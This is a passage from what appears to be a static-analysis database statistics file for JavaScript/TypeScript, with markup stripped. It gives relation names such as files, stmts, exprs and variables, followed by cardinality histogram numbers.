+endColumn + + +12 + + +1 +2 +15664049 + + + + + + +file +id + + +12 + + +1 +2 +674 + + +2 +28 +501 + + +28 +105 +488 + + +105 +211 +488 + + +211 +335 +490 + + +335 +477 +485 + + +477 +637 +488 + + +637 +856 +486 + + +856 +1141 +485 + + +1141 +1602 +485 + + +1604 +2336 +486 + + +2336 +4472 +485 + + +4472 +2368854 +416 + + + + + + +file +beginLine + + +12 + + +1 +2 +674 + + +2 +13 +509 + + +13 +23 +513 + + +23 +35 +516 + + +35 +50 +504 + + +50 +69 +506 + + +69 +92 +489 + + +92 +124 +504 + + +124 +165 +487 + + +165 +230 +490 + + +230 +357 +491 + + +357 +737 +485 + + +737 +277406 +289 + + + + + + +file +beginColumn + + +12 + + +1 +2 +674 + + +2 +12 +491 + + +12 +32 +495 + + +32 +46 +510 + + +46 +56 +498 + + +56 +62 +488 + + +62 +67 +500 + + +67 +71 +477 + + +71 +75 +583 + + +75 +78 +497 + + +78 +80 +403 + + +80 +82 +543 + + +82 +117856 +298 + + + + + + +file +endLine + + +12 + + +1 +2 +674 + + +2 +13 +509 + + +13 +23 +509 + + +23 +35 +520 + + +35 +50 +504 + + +50 +69 +506 + + +69 +92 +489 + + +92 +124 +504 + + +124 +165 +487 + + +165 +230 +490 + + +230 +357 +491 + + +357 +737 +485 + + +737 +277406 +289 + + + + + + +file +endColumn + + +12 + + +1 +2 +682 + + +2 +18 +501 + + +18 +36 +487 + + +36 +51 +513 + + +51 +61 +532 + + +61 +67 +508 + + +67 +72 +568 + + +72 +75 +444 + + +75 +78 +514 + + +78 +80 +484 + + +80 +81 +283 + + +81 +82 +579 + + +82 +117837 +362 + + + + + + +beginLine +id + + +12 + + +1 +6 +666 + + +7 +8 +116499 + + +8 +14 +19181 + + +14 +15 +29298 + + +15 +19 +25329 + + +19 +24 +17273 + + +24 +29 +22410 + + +29 +56 +21150 + + +56 +242 +20830 + + +242 +134468 +4769 + + + + + + +beginLine +file + + +12 + + +1 +2 +117975 + + +2 +3 +120803 + + +3 +8 +21079 + + +8 +6458 +17548 + + + + + + +beginLine +beginColumn + + +12 + + +1 +5 +667 + + +5 +6 +116499 + + +6 +11 +19126 + + +11 +12 +32612 + + +12 +15 +18313 + + +15 +17 +18964 + + +17 +21 +21845 + + +21 +31 +21197 + + +31 +64 +20988 + + +64 +94454 +7194 + + + + + + +beginLine +endLine + + +12 + + +1 +2 +238980 + + +2 +3 +22312 + + +3 +890 +16113 + + + + + + +beginLine +endColumn + + +12 + + +1 +5 +667 + + +5 +6 +116499 + + +6 +12 +20939 + + +12 +13 +28687 + + +13 +16 +19707 + + +16 +18 +20057 + + +18 +22 +21035 + + +22 +33 +21605 + + +33 +69 +21089 + + +69 +94455 +7120 + + + + + + +beginColumn +id + + +12 + + +1 +2 +5117 + + +2 +3 +9246 + + +3 +4 +13440 + + +4 +5 +15857 + + +5 +6 +13813 + + +6 +7 +11696 + + +7 +8 +8777 + + +8 +9 +6887 + + +9 +11 +9723 + + +11 +14 +10392 + + +14 +20 +9364 + + +20 +2248970 +3566 + + + + + + +beginColumn +file + + +12 + + +1 +2 +68610 + + +2 +3 +15842 + + +3 +4 +7965 + + +4 +5 +9221 + + +5 +6 +8014 + + +6 +6458 +8226 + + + + + + +beginColumn +beginLine + + +12 + + +1 +2 +6868 + + +2 +3 +15317 + + +3 +4 +24725 + + +4 +5 +25386 + + +5 +6 +10178 + + +6 +7 +6239 + + +7 +9 +10825 + + +9 +11 +9294 + + +11 +1255 +8841 + + +1258 +277405 +205 + + + + + + +beginColumn +endLine + + +12 + + +1 +2 +6868 + + +2 +3 +15317 + + +3 +4 +24725 + + +4 +5 +25386 + + +5 +6 +10175 + + +6 +7 +6232 + + +7 +9 +10827 + + +9 +11 +9299 + + +11 +1227 +8842 + + +1256 +277405 +207 + + + + + + +beginColumn +endColumn + + +12 + + +1 +2 +24039 + + +2 +3 +21662 + + +3 +4 +22809 + + +4 +5 +17118 + + +5 +6 +12038 + + +6 +7 +7768 + + +7 +10 +9297 + + +10 +1064 +3147 + + + + + + +endLine +id + + +12 + + +1 +6 +666 + + +7 +8 +116499 + + +8 +14 +18715 + + +14 +15 +30262 + + +15 +19 +24946 + + +19 +24 +17066 + + +24 +29 +22451 + + +29 +56 +21060 + + +56 +237 +20821 + + +237 +134470 +4919 + + + + + + +endLine +file + + +12 + + +1 +2 +117975 + + +2 +3 +120803 + + +3 +8 +21076 + + +8 +6458 +17551 + + + + + + +endLine +beginLine + + +12 + + +1 +2 +243883 + + +2 +4 +23431 + + +4 +71 +10091 + + + + + + +endLine +beginColumn + + +12 + + +1 +5 +667 + + +5 +6 +116499 + + +6 +11 +19057 + + +11 +12 +32046 + + +12 +15 +18779 + + +15 +17 +18710 + + +17 +21 +21785 + + +21 +31 +21103 + + +31 +63 +20930 + + +63 +94454 +7829 + + + + + + +endLine +endColumn + + +12 + + +1 +5 +667 + + +5 +6 +116499 + + +6 +12 +21177 + + +12 +13 +28718 + + +13 +16 +19585 + + +16 +18 +21210 + + +18 +23 +23344 + + +23 +35 +21013 + + +35 +80 +20938 + + +80 +94454 +4254 + + + + + + +endColumn +id + + +12 + + +1 +2 +4439 + + +2 +3 +8489 + + +3 +4 +12884 + + +4 +5 +16048 + + +5 +6 +15554 + + +6 +7 +12546 + + +7 +8 +9231 + + +8 +9 +6405 + + +9 +11 +9266 + + +11 +14 +10367 + + +14 +20 +9186 + + +20 +489713 +3453 + + + + + + +endColumn +file + + +12 + + +1 +2 +68569 + + +2 +3 +15919 + + +3 +4 +7876 + + +4 +5 +9221 + + +5 +6 +8062 + + +6 +6458 +8221 + + + + + + +endColumn +beginLine + + +12 + + +1 +2 +6848 + + +2 +3 +15273 + + +3 +4 +24807 + + +4 +5 +25343 + + +5 +6 +10180 + + +6 +7 +6269 + + +7 +9 +10857 + + +9 +11 +9251 + + +11 +1768 +8841 + + +1780 +212575 +199 + + + + + + +endColumn +beginColumn + + +12 + + +1 +2 +15842 + + +2 +3 +27460 + + +3 +4 +26707 + + +4 +5 +18639 + + +5 +6 +11518 + + +6 +8 +10766 + + +8 +265 +6936 + + + + + + +endColumn +endLine + + +12 + + +1 +2 +6850 + + +2 +3 +15271 + + +3 +4 +24807 + + +4 +5 +25343 + + +5 +6 +10180 + + +6 +7 +6269 + + +7 +9 +10858 + + +9 +11 +9252 + + +11 +1789 +8841 + + +1795 +212360 +197 + + + + + + + + +numlines +122044 + + +element_id +122044 + + +num_lines +1136 + + +num_code +939 + + +num_comment +418 + + + + +element_id +num_lines + + +12 + + +1 +2 +122044 + + + + + + +element_id +num_code + + +12 + + +1 +2 +122044 + + + + + + +element_id +num_comment + + +12 + + +1 +2 +122044 + + + + + + +num_lines +element_id + + +12 + + +1 +2 +399 + + +2 +3 +144 + + +3 +4 +97 + + +4 +6 +91 + + +6 +9 +86 + + +9 +15 +90 + + +15 +36 +86 + + +36 +174 +86 + + +175 +21589 +57 + + + + + + +num_lines +num_code + + +12 + + +1 +2 +444 + + +2 +3 +140 + + +3 +4 +95 + + +4 +6 +87 + + +6 +9 +85 + + +9 +14 +88 + + +14 +24 +90 + + +24 +33 +89 + + +33 +38 +18 + + + + + + +num_lines +num_comment + + +12 + + +1 +2 +444 + + +2 +3 +140 + + +3 +4 +94 + + +4 +6 +92 + + +6 +9 +90 + + +9 +14 +90 + + +14 +20 +89 + + +20 +27 +89 + + +27 +30 +8 + + + + + + +num_code +element_id + + +12 + + +1 +2 +317 + + +2 +3 +125 + + +3 +4 +67 + + +4 +5 +61 + + +5 +8 +67 + + +8 +12 +73 + + +12 +26 +72 + + +26 +69 +71 + + +69 +1540 +71 + + +1747 +22000 +15 + + + + + + +num_code +num_lines + + +12 + + +1 +2 +349 + + +2 +3 +118 + + +3 +4 +77 + + +4 +6 +76 + + +6 +10 +84 + + +10 +19 +78 + + +19 +31 +79 + + +31 +44 +73 + + +44 +52 +5 + + + + + + +num_code +num_comment + + +12 + + +1 +2 +347 + + +2 +3 +121 + + +3 +4 +79 + + +4 +6 +74 + + +6 +9 +74 + + +9 +16 +80 + + +16 +23 +72 + + +23 +31 +76 + + +31 +40 +16 + + + + + + +num_comment +element_id + + +12 + + +1 +2 +147 + + +2 +3 +67 + + +3 +4 +26 + + +4 +5 +26 + + +5 +7 +32 + + +7 +12 +34 + + +12 +32 +34 + + +33 +135 +32 + + +150 +93795 +20 + + + + + + +num_comment +num_lines + + +12 + + +1 +2 +171 + + +2 +3 +57 + + +3 +4 +32 + + +4 +5 +24 + + +5 +8 +33 + + +8 +18 +35 + + +19 +47 +32 + + +52 +253 +33 + + +362 +363 +1 + + + + + + +num_comment +num_code + + +12 + + +1 +2 +174 + + +2 +3 +54 + + +3 +4 +33 + + +4 +5 +22 + + +5 +8 +33 + + +8 +18 +36 + + +19 +47 +32 + + +51 +230 +32 + + +232 +346 +2 + + + + + + + + +files +id +6457 + + +id +6457 + + +name +6457 + + + + +id +name + + +12 + + +1 +2 +6457 + + + + + + +name +id + + +12 + + +1 +2 +6457 + + + + + + + + +folders +id +1590 + + +id +1590 + + +name +1590 + + + + +id +name + + +12 + + +1 +2 +1590 + + + + + + +name +id + + +12 + + +1 +2 +1590 + + + + + + + + +containerparent +child +8046 + + +parent +1590 + + +child +8046 + + + + +parent +child + + +12 + + +1 +2 +525 + + +2 +3 +326 + + +3 +4 +207 + + +4 +5 +128 + + +5 +7 +138 + + +7 +11 +132 + + +11 +53 +120 + + +60 +335 +14 + + + + + + +child +parent + + +12 + + +1 +2 +8046 + + + + + + + + +externalData +5684 + + +id +950 + + +path +3 + + +column +6 + + +value +790 + + + + +id +path + + +12 + + +1 +2 +950 + + + + + + +id +column + + +12 + + +2 +3 +4 + + +6 +7 +946 + + + + + + +id +value + + +12 + + +2 +6 +8 + + +6 +7 +942 + + + + + + +path +id + + +12 + + +4 +5 +1 + + +72 +73 +1 + + +874 +875 +1 + + + + + + +path +column + + +12 + + +2 +3 +1 + + +6 +7 +2 + + + + + + +path +value + + +12 + + +8 +9 +1 + + +86 +87 +1 + + +722 +723 +1 + + + + + + +column +id + + +12 + + +946 +947 +4 + + +950 +951 +2 + + + + + + +column +path + + +12 + + +2 +3 +4 + + +3 +4 +2 + + + + + + +column +value + + +12 + + +2 +3 +1 + + +6 +7 +1 + + +31 +32 +1 + + +93 +94 +1 + + +117 +118 +1 + + +620 +621 +1 + + + + + + +value +id + + +12 + + +1 +2 +478 + + +2 +3 +132 + + +3 +5 +69 + + +5 +16 +61 + + +16 +928 +50 + + + + + + +value +path + + +12 + + +1 +2 +764 + + +2 +3 +26 + + + + + + +value +column + + +12 + + +1 +2 +711 + + +2 +3 +79 + + + + + + + + +sourceLocationPrefix +1 + + +prefix +1 + + + + + +toplevels +id +5320 + + +id +5320 + + +kind +4 + + + + +id +kind + + +12 + + +1 +2 +5320 + + + + + + +kind +id + + +12 + + +3 +4 +1 + + +31 +32 +1 + + +86 +87 +1 + + +5200 +5201 +1 + + + + + + + + +is_externs +44 + + +toplevel +44 + + + + + +is_instantiated +5 + + +decl +5 + + + + + +has_declare_keyword +66 + + +stmt +66 + + + + + +has_asserts_keyword +66 + + +node +66 + + + + + +is_abstract_member +66 + + +id +66 + + + + + +has_public_keyword +9297 + + +id +9297 + + + + + +has_private_keyword +11391 + + +id +11391 + + + + + +has_protected_keyword +1048 + + +id +1048 + + + + + +has_readonly_keyword +2338 + + +id +2338 + + + + + +has_type_keyword +1000 + + +id +1000 + + + + + +is_optional_member +3668 + + +id +3668 + + + + + +has_definite_assignment_assertion +100 + + +id +100 + + + + + +is_optional_parameter_declaration +3966 + + +parameter +3966 + + + + + +parameter_fields +2693 + + +field +2693 + + +constructor +1020 + + +param_index +20 + + + + +field +constructor + + +12 + + +1 +2 +2693 + + + + + + +field +param_index + + +12 + + +1 +2 +2693 + + + + + + +constructor +field + + +12 + + +1 +2 +439 + + +2 +3 +233 + + +3 +4 +118 + + +4 +5 +78 + + +5 +7 +83 + + +7 +21 +69 + + + + + + +constructor +param_index + + +12 + + +1 +2 +439 + + +2 +3 +233 + + +3 +4 +118 + + +4 +5 +78 + + +5 +7 +83 + + +7 +21 +69 + + + + + + +param_index +field + + +12 + + +1 +2 +1 + + +2 +3 +1 + + +3 +4 +1 + + +4 +5 +1 + + +5 +6 +1 + + +6 +7 +1 + + +8 +9 +1 + + +10 +11 +1 + + +15 +16 +1 + + +22 +23 +1 + + +29 +30 +1 + + +36 +37 +1 + + +48 +49 +1 + + +69 +70 +1 + + +104 +105 +1 + + +152 +153 +1 + + +230 +231 +1 + + +348 +349 +1 + + +581 +582 +1 + + +1020 +1021 +1 + + + + + + +param_index +constructor + + +12 + + +1 +2 +1 + + +2 +3 +1 + + +3 +4 +1 + + +4 +5 +1 + + +5 +6 +1 + + +6 +7 +1 + + +8 +9 +1 + + +10 +11 +1 + + +15 +16 +1 + + +22 +23 +1 + + +29 +30 +1 + + +36 +37 +1 + + +48 +49 +1 + + +69 +70 +1 + + +104 +105 +1 + + +152 +153 +1 + + +230 +231 +1 + + +348 +349 +1 + + +581 +582 +1 + + +1020 +1021 +1 + + + + + + + + +is_const_enum +62 + + +id +62 + + + + + +is_abstract_class +116 + + +id +116 + + + + + +typeexprs +54050 + + +id +54050 + + +kind +6 + + +parent +29264 + + +idx +26 + + +tostring +3278 + + + + +id +kind + + +12 + + +1 +2 +54050 + + + + + + +id +parent + + +12 + + +1 +2 +54050 + + + + + + +id +idx + + +12 + + +1 +2 +54050 + + + + + + +id +tostring + + +12 + + +1 +2 +54050 + + + + + + +kind +id + + +12 + + +3 +4 +1 + + +4 +5 +1 + + +733 +734 +1 + + +2513 +2514 +1 + + +25306 +25307 +1 + + +25491 +25492 +1 + + + + + + +kind +parent + + +12 + + +3 +4 +1 + + +4 +5 +1 + + +733 +734 +1 + + +2513 +2514 +1 + + +16661 +16662 +1 + + +17601 +17602 +1 + + + + + + +kind +idx + + +12 + + +1 +2 +2 + + +3 +4 +1 + + +4 +5 +1 + + +19 +20 +1 + + +25 +26 +1 + + + + + + +kind +tostring + + +12 + + +2 +3 +1 + + +3 +4 +1 + + +9 +10 +1 + + +242 +243 +1 + + +2075 +2076 +1 + + +2322 +2323 +1 + + + + + + +parent +id + + +12 + + +1 +2 +15321 + + +2 +3 +7887 + + +3 +4 +3725 + + +4 +9 +2229 + + +9 +24 +102 + + + + + + +parent +kind + + +12 + + +1 +2 +21285 + + +2 +3 +7707 + + +3 +4 +272 + + + + + + +parent +idx + + +12 + + +1 +2 +15321 + + +2 +3 +7887 + + +3 +4 +3725 + + +4 +9 +2229 + + +9 +24 +102 + + + + + + +parent +tostring + + +12 + + +1 +2 +16315 + + +2 +3 +8432 + + +3 +4 +3126 + + +4 +22 +1391 + + + + + + +idx +id + + +12 + + +1 +2 +2 + + +3 +4 +2 + + +4 +7 +2 + + +10 +12 +2 + + +13 +22 +2 + + +27 +38 +2 + + +54 +61 +2 + + +101 +212 +2 + + +356 +530 +2 + + +859 +1645 +2 + + +2513 +2519 +2 + + +3330 +7198 +2 + + +15305 +19237 +2 + + + + + + +idx +kind + + +12 + + +1 +2 +7 + + +2 +3 +14 + + +3 +4 +2 + + +4 +5 +3 + + + + + + +idx +parent + + +12 + + +1 +2 +2 + + +3 +4 +2 + + +4 +7 +2 + + +10 +12 +2 + + +13 +22 +2 + + +27 +38 +2 + + +54 +61 +2 + + +101 +212 +2 + + +356 +530 +2 + + +859 +1645 +2 + + +2513 +2519 +2 + + +3330 +7198 +2 + + +15305 +19237 +2 + + + + + + +idx +tostring + + +12 + + +1 +2 +2 + + +3 +4 +2 + + +4 +6 +2 + + +9 +10 +2 + + +12 +17 +2 + + +18 +26 +2 + + +28 +31 +2 + + +37 +44 +2 + + +60 +71 +2 + + +108 +196 +2 + + +395 +667 +2 + + +746 +978 +2 + + +1522 +2076 +2 + + + + + + +tostring +id + + +12 + + +1 +2 +1085 + + +2 +3 +627 + + +3 +4 +344 + + +4 +5 +322 + + +5 +7 +292 + + +7 +12 +260 + + +12 +45 +247 + + +45 +7788 +101 + + + + + + +tostring +kind + + +12 + + +1 +2 +1903 + + +2 +3 +1375 + + + + + + +tostring +parent + + +12 + + +1 +2 +1097 + + +2 +3 +631 + + +3 +4 +341 + + +4 +5 +327 + + +5 +7 +292 + + +7 +12 +253 + + +12 +48 +246 + + +48 +6190 +91 + + + + + + +tostring +idx + + +12 + + +1 +2 +1450 + + +2 +3 +939 + + +3 +4 +481 + + +4 +6 +289 + + +6 +19 +119 + + + + + + + + +is_for_await_of +1 + + +forof +1 + + + + + +is_module +21 + + +tl +21 + + + + + +is_es2015_module +21 + + +tl +21 + + + + + +is_closure_module +21 + + +tl +21 + + + + + +toplevel_parent_xml_node +43 + + +toplevel +43 + + +xmlnode +43 + + + + +toplevel +xmlnode + + +12 + + +1 +2 +43 + + + + + + +xmlnode +toplevel + + +12 + + +1 +2 +43 + + + + + + + + +xml_element_parent_expression +1 + + +xmlnode +1 + + +expression +1 + + +index +1 + + + + +xmlnode +expression + + +12 + + +1 +2 +1 + + + + + + +xmlnode +index + + +12 + + +1 +2 +1 + + + + + + +expression +xmlnode + + +12 + + +1 +2 +1 + + + + + + +expression +index + + +12 + + +1 +2 +1 + + + + + + +index +xmlnode + + +12 + + +1 +2 +1 + + + + + + +index +expression + + +12 + + +1 +2 +1 + + + + + + + + +is_nodejs +12 + + +tl +12 + + + + + +stmts +id +1096691 + + +id +1096691 + + +kind +31 + + +parent +412140 + + +idx +152947 + + +tostring +284956 + + + + +id +kind + + +12 + + +1 +2 +1096691 + + + + + + +id +parent + + +12 + + +1 +2 +1096691 + + + + + + +id +idx + + +12 + + +1 +2 +1096691 + + + + + + +id +tostring + + +12 + + +1 +2 +1096691 + + + + + + +kind +id + + +12 + + +1 +2 +3 + + +3 +5 +2 + + +5 +9 +2 + + +31 +42 +2 + + +61 +552 +2 + + +1118 +1137 +2 + + +1272 +1316 +2 + + +1316 +1379 +2 + + +1471 +1570 +2 + + +1642 +2306 +2 + + +3120 +5386 +2 + + +8674 +10150 +2 + + +16771 +48210 +2 + + +68214 +105607 +2 + + +204994 +610341 +2 + + + + + + +kind +parent + + +12 + + +1 +2 +4 + + +3 +5 +2 + + +5 +6 +2 + + +35 +59 +2 + + +298 +424 +2 + + +738 +1157 +2 + + +1253 +1263 +2 + + +1271 +1321 +2 + + +1495 +1568 +2 + + +1642 +2306 +2 + + +2999 +4416 +2 + + +4734 +10123 +2 + + +48139 +48347 +2 + + +50857 +162082 +2 + + +191077 +191078 +1 + + + + + + +kind +idx + + +12 + + +1 +2 +3 + + +2 +3 +2 + + +3 +4 +2 + + +8 +9 +2 + + +10 +12 +2 + + +16 +22 +2 + + +28 +32 +2 + + +36 +37 +2 + + +39 +51 +2 + + +54 +63 +2 + + +65 +67 +2 + + +116 +118 +2 + + +122 +138 +2 + + +251 +1564 +2 + + +1967 +152946 +2 + + + + + + +kind +tostring + + +12 + + +1 +2 +5 + + +2 +3 +2 + + +4 +11 +2 + + +12 +17 +2 + + +88 +104 +2 + + +147 +168 +2 + + +239 +296 +2 + + +356 +428 +2 + + +591 +705 +2 + + +811 +829 +2 + + +1092 +2254 +2 + + +2665 +10292 +2 + + +18023 +21916 +2 + + +43911 +180066 +2 + + + + + + +parent +id + + +12 + + +1 +2 +265890 + + +2 +3 +69435 + + +3 +4 +25109 + + +4 +8 +34966 + + +8 +152946 +16740 + + + + + + +parent +kind + + +12 + + +1 +2 +319546 + + +2 +3 +67918 + + +3 +23 +24676 + + + + + + +parent +idx + + +12 + + +1 +2 +265890 + + +2 +3 +69435 + + +3 +4 +25109 + + +4 +8 +34966 + + +8 +152946 +16740 + + + + + + +parent +tostring + + +12 + + +1 +2 +275359 + + +2 +3 +62818 + + +3 +4 +25781 + + +4 +8 +34293 + + +8 +19511 +13889 + + + + + + +idx +id + + +12 + + +1 +2 +149939 + + +2 +220361 +3008 + + + + + + +idx +kind + + +12 + + +1 +2 +149940 + + +2 +28 +3007 + + + + + + +idx +parent + + +12 + + +1 +2 +149939 + + +2 +220361 +3008 + + + + + + +idx +tostring + + +12 + + +1 +2 +149939 + + +2 +88922 +3008 + + + + + + +tostring +id + + +12 + + +1 +2 +186537 + + +2 +3 +48494 + + +3 +5 +24651 + + +5 +37 +21526 + + +37 +72175 +3748 + + + + + + +tostring +kind + + +12 + + +1 +2 +284895 + + +2 +4 +61 + + + + + + +tostring +parent + + +12 + + +1 +2 +195596 + + +2 +3 +45562 + + +3 +5 +23127 + + +5 +66340 +20671 + + + + + + +tostring +idx + + +12 + + +1 +2 +225945 + + +2 +3 +33948 + + +3 +13 +21496 + + +13 +903 +3567 + + + + + + + + +stmt_containers +1096691 + + +stmt +1096691 + + +container +120740 + + + + +stmt +container + + +12 + + +1 +2 +1096691 + + + + + + +container +stmt + + +12 + + +1 +2 +6778 + + +2 +3 +35010 + + +3 +4 +16178 + + +4 +5 +12184 + + +5 +6 +9476 + + +6 +7 +7569 + + +7 +9 +10084 + + +9 +13 +10057 + + +13 +27 +9196 + + +27 +152947 +4208 + + + + + + + + +jump_targets +11791 + + +jump +11791 + + +target +4873 + + + + +jump +target + + +12 + + +1 +2 +11791 + + + + + + +target +jump + + +12 + + +1 +2 +2542 + + +2 +3 +1106 + + +3 +4 +505 + + +4 +6 +410 + + +6 +260 +310 + + + + + + + + +exprs +id +5495305 + + +id +5495305 + + +kind +85 + + +parent +3130204 + + +idx +17698 + + +tostring +834491 + + + + +id +kind + + +12 + + +1 +2 +5495305 + + + + + + +id +parent + + +12 + + +1 +2 +5495305 + + + + + + +id +idx + + +12 + + +1 +2 +5495305 + + + + + + +id +tostring + + +12 + + +1 +2 +5495305 + + + + + + +kind +id + + +12 + + +1 +4 +7 + + +4 +45 +7 + + +50 +97 +7 + + +108 +458 +7 + + +503 +824 +7 + + +1135 +2497 +7 + + +2527 +5439 +7 + + +5655 +10255 +7 + + +10789 +15893 +7 + + +17758 +42854 +7 + + +50958 +130844 +7 + + +245084 +722374 +7 + + +1295408 +1295409 +1 + + + + + + +kind +parent + + +12 + + +1 +3 +7 + + +3 +45 +7 + + +47 +93 +7 + + +106 +407 +7 + + +457 +809 +7 + + +1108 +2420 +7 + + +2502 +5349 +7 + + +5453 +10133 +7 + + +10658 +15697 +7 + + +16273 +36888 +7 + + +41849 +128642 +7 + + +199566 +722374 +7 + + +1171898 +1171899 +1 + + + + + + +kind +idx + + +12 + + +1 +2 +7 + + +2 +3 +12 + + +3 +4 +11 + + +4 +5 +7 + + +5 +6 +7 + + +6 +7 +3 + + +7 +8 +7 + + +8 +11 +6 + + +12 +18 +7 + + +20 +64 +7 + + +82 +395 +7 + + +431 +13375 +4 + + + + + + +kind +tostring + + +12 + + +1 +2 +7 + + +2 +6 +7 + + +8 +37 +7 + + +38 +126 +7 + + +142 +304 +7 + + +358 +721 +7 + + +811 +1485 +7 + + +1523 +2918 +7 + + +3305 +5078 +7 + + +5422 +9940 +7 + + +10536 +40606 +7 + + +46227 +123090 +7 + + +128754 +128755 +1 + + + + + + +parent +id + + +12 + + +1 +2 +1100280 + + +2 +3 +1876078 + + +3 +17692 +153846 + + + + + + +parent +kind + + +12 + + +1 +2 +1300246 + + +2 +3 +1747609 + + +3 +8 +82349 + + + + + + +parent +idx + + +12 + + +1 +2 +1100280 + + +2 +3 +1876078 + + +3 +17692 +153846 + + + + + + +parent +tostring + + +12 + + +1 +2 +1108803 + + +2 +3 +1870864 + + +3 +17526 +150537 + + + + + + +idx +id + + +12 + + +1 +2 +4092 + + +2 +3 +1365 + + +3 +4 +1995 + + +4 +5 +283 + + +5 +6 +1681 + + +6 +7 +5909 + + +7 +10 +1344 + + +10 +3049605 +1029 + + + + + + +idx +kind + + +12 + + +1 +2 +10648 + + +2 +3 +6398 + + +3 +83 +652 + + + + + + +idx +parent + + +12 + + +1 +2 +4092 + + +2 +3 +1365 + + +3 +4 +1995 + + +4 +5 +283 + + +5 +6 +1681 + + +6 +7 +5909 + + +7 +10 +1344 + + +10 +3049605 +1029 + + + + + + +idx +tostring + + +12 + + +1 +2 +4093 + + +2 +3 +1365 + + +3 +4 +2014 + + +4 +5 +1147 + + +5 +6 +1529 + + +6 +7 +5401 + + +7 +10 +1499 + + +10 +573348 +650 + + + + + + +tostring +id + + +12 + + +1 +2 +466570 + + +2 +3 +157949 + + +3 +4 +55443 + + +4 +6 +61411 + + +6 +17 +63412 + + +17 +128652 +29706 + + + + + + +tostring +kind + + +12 + + +1 +2 +772624 + + +2 +24 +61867 + + + + + + +tostring +parent + + +12 + + +1 +2 +467110 + + +2 +3 +158201 + + +3 +4 +55446 + + +4 +6 +61061 + + +6 +17 +63168 + + +17 +128642 +29505 + + + + + + +tostring +idx + + +12 + + +1 +2 +724438 + + +2 +3 +86524 + + +3 +7765 +23529 + + + + + + + + +literals +expr +3145090 + + +value +216517 + + +raw +234110 + + +expr +3145090 + + + + +value +raw + + +12 + + +1 +2 +201221 + + +2 +25 +15296 + + + + + + +value +expr + + +12 + + +1 +2 +95821 + + +2 +3 +41222 + + +3 +4 +19627 + + +4 +5 +16097 + + +5 +9 +18825 + + +9 +31 +16474 + + +31 +122435 +8451 + + + + + + +raw +value + + +12 + + +1 +2 +234110 + + + + + + +raw +expr + + +12 + + +1 +2 +104635 + + +2 +3 +47230 + + +3 +4 +20082 + + +4 +5 +16835 + + +5 +9 +19610 + + +9 +34 +17695 + + +34 +120241 +8023 + + + + + + +expr +value + + +12 + + +1 +2 +3145090 + + + + + + +expr +raw + + +12 + + +1 +2 +3145090 + + + + + + + + +enclosing_stmt +5372899 + + +expr +5372899 + + +stmt +854574 + + + + +expr +stmt + + +12 + + +1 +2 +5372899 + + + + + + +stmt +expr + + +12 + + +1 +3 +74578 + + +3 +4 +254844 + + +4 +5 +57228 + + +5 +6 +136234 + + +6 +7 +44557 + + +7 +8 +79401 + + +8 +9 +55420 + + +9 +11 +63155 + + +11 +17 +65146 + + +17 +88321 +24011 + + + + + + + + +expr_containers +5495305 + + +expr +5495305 + + +container +118511 + + + + +expr +container + + +12 + + +1 +2 +5495305 + + + + + + +container +expr + + +12 + + +1 +4 +7197 + + +4 +6 +9110 + + +6 +8 +9222 + + +8 +10 +8424 + + +10 +13 +10651 + + +13 +16 +8706 + + +16 +20 +9358 + + +20 +25 +9955 + + +25 +31 +8893 + + +31 +40 +9356 + + +40 +54 +9017 + + +54 +85 +8935 + + +85 +484 +8890 + + +484 +459128 +797 + + + + + + + + +array_size +28188 + + +ae +28188 + + +sz +118 + + + + +ae +sz + + +12 + + +1 +2 +28188 + + + + + + +sz +ae + + +12 + + +1 +2 +52 + + +2 +3 +21 + + +3 +5 +9 + + +5 +8 +9 + + +9 +20 +9 + + +22 +181 +9 + + +231 +12345 +9 + + + + + + + + +is_delegating +4 + + +yield +4 + + + + + +expr_contains_template_tag_location +31 + + +expr +31 + + +location +31 + + + + +expr +location + + +12 + + +1 +2 +31 + + + + + + +location +expr + + +12 + + +1 +2 +31 + + + + + + + + +template_placeholder_tag_info +283 + + +node +283 + + +parentNode +92 + + +raw +24 + + + + +node +parentNode + + +12 + + +1 +2 +283 + + + + + + +node +raw + + +12 + + +1 +2 +283 + + + + + + +parentNode +node + + +12 + + +1 +2 +49 + + +2 +3 +4 + + +3 +4 +9 + + +5 +6 +9 + + +6 +7 +4 + + +7 +8 +13 + + +9 +11 +4 + + + + + + +parentNode +raw + + +12 + + +1 +2 +49 + + +2 +3 +4 + + +3 +4 +9 + + +4 +5 +11 + + +5 +6 +13 + + +6 +11 +6 + + + + + + +raw +node + + +12 + + +1 +2 +2 + + +2 +3 +4 + + +3 +4 +9 + + +4 +6 +2 + + +16 +17 +2 + + +20 +26 +2 + + +34 +45 +2 + + +82 +83 +1 + + + + + + +raw +parentNode + + +12 + + +1 +2 +2 + + +2 +3 +4 + + +3 +4 +9 + + +4 +6 +2 + + +16 +17 +2 + + +20 +26 +2 + + +34 +41 +2 + + +44 +45 +1 + + + + + + + + +scopes +id +118172 + + +id +118172 + + +kind +8 + + + + +id +kind + + +12 + + +1 +2 +118172 + + + + + + +kind +id + + +12 + + +1 +2 +1 + + +4 +5 +1 + + +17 +18 +1 + + +21 +22 +1 + + +28 +29 +1 + + +584 +585 +1 + + +1272 +1273 +1 + + +116245 +116246 +1 + + + + + + + + +scopenodes +118171 + + +node +118171 + + +scope +118171 + + + + +node +scope + + +12 + + +1 +2 +118171 + + + + + + +scope +node + + +12 + + +1 +2 +118171 + + + + + + + + +scopenesting +118171 + + +inner +118171 + + +outer +33143 + + + + +inner +outer + + +12 + + +1 +2 +118171 + + + + + + +outer +inner + + +12 + + +1 +2 +17868 + + +2 +3 +6196 + + +3 +4 +2666 + + +4 +6 +2791 + + +6 +13 +2584 + + +13 +17277 +1038 + + + + + + + + +is_generator +62 + + +fun +62 + + + + + +has_rest_parameter +33 + + +fun +33 + + + + + +is_async +50 + + +fun +50 + + + + + +variables +id +364388 + + +id +364388 + + +name +56559 + + +scope +118168 + + + + +id +name + + +12 + + +1 +2 +364388 + + + + + + +id +scope + + +12 + + +1 +2 +364388 + + + + + + +name +id + + +12 + + +1 +2 +38013 + + +2 +3 +9547 + + +3 +5 +4518 + + +5 +115 +4242 + + +115 +116259 +239 + + + + + + +name +scope + + +12 + + +1 +2 +38013 + + +2 +3 +9547 + + +3 +5 +4518 + + +5 +115 +4242 + + +115 +116259 +239 + + + + + + +scope +id + + +12 + + +1 +2 +39907 + + +2 +3 +32053 + + +3 +4 +18882 + + +4 +5 +9814 + + +5 +8 +10909 + + +8 +8779 +6603 + + + + + + +scope +name + + +12 + + +1 +2 +39907 + + +2 +3 +32053 + + +3 +4 +18882 + + +4 +5 +9814 + + +5 +8 +10909 + + +8 +8779 